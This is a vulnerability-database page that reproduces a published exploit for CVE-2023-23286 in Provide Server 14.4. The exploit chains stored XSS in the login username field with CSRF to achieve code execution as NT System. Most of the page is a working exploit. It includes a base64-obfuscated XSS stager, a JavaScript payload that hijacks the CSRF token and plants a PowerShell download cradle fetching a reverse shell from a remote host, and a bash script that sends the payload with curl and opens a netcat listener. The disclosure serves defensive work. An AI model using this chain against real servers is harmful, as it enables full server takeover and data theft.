Vulners
Lucene search
Provide Server 14.4 XSS / Cross Site Request Forgery / Code Execution
🗓️ 06 Apr 2023 00:00:00Reported by Andreas Finstad, f20.beType 
packetstorm🔗 packetstormsecurity.com👁 229 Views
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Provide Server v.14.4 XSS - CSRF & Remote Code Execution Vulnerabilities | 5 Apr 202300:00 | – | zdt |
 | Provide server 跨站脚本漏洞 | 10 Feb 202300:00 | – | cnnvd |
 | CVE-2023-23286 | 10 Feb 202300:00 | – | cve |
 | CVE-2023-23286 | 10 Feb 202300:00 | – | cvelist |
 | Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE) | 5 Apr 202300:00 | – | exploitdb |
 | EUVD-2023-27386 | 3 Oct 202520:07 | – | euvd |
 | CVE-2023-23286 | 10 Feb 202303:15 | – | nvd |
 | CVE-2023-23286 | 10 Feb 202303:15 | – | osv |
 | Cross site scripting | 10 Feb 202303:15 | – | prion |
 | PT-2023-18887 · Unknown · Provide Server | 10 Feb 202300:00 | – | ptsecurity |
10
`Provide Server v. 14.4
CVE-2023-23286
Vulnerabilities:
CWE-79: Improper Neutralization of Input During Web Page Generation
Unauthenticated stored XSS in server-log delivered via username field from login-form
CWE-352: Cross-Site Request Forgery
CSRF-token exposed in javascript, making it possible to obtain a valid CSRF-Token and use it in XMLHTTPRequests. This vulnerability allows an attacker to add a task that runs commands on the server as "NT-System" Impact:
An attacker could exploit the unauthenticated stored XSS vulnerability by injecting malicious code into the login form's username field. When the server-log is viewed, the malicious code will be executed, potentially allowing the attacker to steal user data or execute further attacks.
By exploiting the CSRF vulnerability, an attacker could add a task to the server that runs commands with NT-System privileges. This could potentially allow the attacker to take complete control of the server, access sensitive data, or disrupt service.
Proof Of Consept
RCE via XSS and CSRF
The attacker places the staged XSS into the username field and sends the login request. This will place the XSS stager in the server log and trigger when a administrator opens the log.
The XSS stager downloads and runs the XSS payload. The payload will add a task that runs the powershell downloadcradle every time someone connects to the server. Even unauthenticated connections.
The powershell-script downloaded in this example is a reverse shell, connecting back to the attacker. As the task runs as NT System on the server, the attacker will have full controll on the server.
Powershell Downloadcradle
PowerShell -noprofile -executionpolicy bypass "Start-process powershell.exe -argumentlist '-window hidden -noexit Start-Job { IEX(IWR https://example.com/rev.ps1 -UseBasicParsing) }'";exit
Staged XSS
<img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZXhhbXBsZS5jb20veHNzLmpzIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw src=https://example.com/1 onload=eval(atob(this.id))>
XSS payload
var vhost = window.location.protocol+'\/\/'+window.location.host
var csrf_token = document.querySelector("meta[name='csrf-token']").getAttribute("content")
, o = XMLHttpRequest.prototype.open;
XMLHttpRequest.prototype.open = function(a, b) {
var c = o.apply(this, arguments);
return (b.startsWith("/") || b.startsWith(window.location.origin)) && this.setRequestHeader("X-CSRF-Token", csrf_token),
c
}
fetch(vhost+'/ajax/SetEventsAndMessages',{
method: 'POST',
headers: {
'Content-Length': '3845',
'Sec-Ch-Ua': '"Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"',
'X-Csrf-Token': csrf_token,
'Sec-Ch-Ua-Mobile': '?0',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54',
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'X-Requested-With': 'XMLHttpRequest',
'Sec-Ch-Ua-Platform': '"macOS"',
'Origin': vhost,
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9,nb;q=0.8,no;q=0.7,en-GB;q=0.6',
'Connection': 'close'
},
credentials: 'include',
body: '%7B%22MsgOnCreateDirectory%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgOnUploadStart%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22File+status+okay;+about+to+open+data+connection.%22%7D,%22MsgOnUploadEnd%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Closing+data+connection.%22%7D,%22MsgOnDownloadEnd%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Closing+data+connection.%22%7D,%22MsgOnRemoveDirectory%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgBeforeCreateDirectory%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgBeforeRename%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgBeforeRemoveDirectory%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnQuit%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Goodbye.%22%7D,%22MsgOnCopy%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgOnDownloadStart%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22File+status+okay;+about+to+open+data+connection.%22%7D,%22MsgBeforeUpload%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnListDirectoryEnd%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Closing+data+connection.%22%7D,%22MsgBeforeLoggedIn%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Login+not+accepted%22%7D,%22MsgOnRename%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgBeforeConnect%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Not+connected,+access+denied.+Please+don\'t+hammer.%22%7D,%22MsgBeforeDownload%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnChangeDirectory%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22CWD+Command+successful.%22%7D,%22MsgOnConnect%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22%25EXECUTE(PowerShell++-noprofile+-executionpolicy+bypass+%5C%22Start-process+powershell.exe+-argumentlist+\'-window+hidden+-noexit+Start-Job+-ScriptBlock+%7B+IEX(IWR+https://example.com/rev.ps1+-UseBasicParsing)+%7D\'%5C%22;exit)%25%22%7D,%22MsgOnListDirectoryStart%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Opening+connection+for+/bin/ls.%22%7D,%22MsgBeforeRemoveFile%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgBeforeChangeDirectory%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnDisconnect%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22%22%7D,%22MsgOnRemoveFile%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgBeforeCopy%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgBeforeListDirectory%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnLoggedIn%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22User+logged+in,+proceed.%22%7D%7D'
});
window.location.href = vhost;
fetch(vhost.replace(':8443',''))
Bash script for running exploit
#!/bin/bash
echo "Sending payload"
host=$1
if [ "$2" == "trigger" ]
then
curl -s -k https://$1 >/dev/null
else
curl -i -s -k $'POST' -H $host -H $'Content-Length: 262' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-User: ?1' -H $'Sec-Fetch-Dest: document' -H "Referer: https://$host" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9,nb;q=0.8,no;q=0.7,en-GB;q=0.6' -H $'Connection: close' --data-binary $'path=%2F&username=%3Cimg+id%3DdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL2FsZXJ0Mi5qcyI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs%3D+src%3Dhttps%3A%2F%2Ff20.be%2F1+onload%3Deval%28atob%28this.id%29%29%3E&password=&logon=Log+in' "https://$host" > /dev/null
clear
fi
echo "Waiting..."
rlwrap nc -lvnp 5555
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Apr 2023 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.16.1
EPSS0.03213
SSVC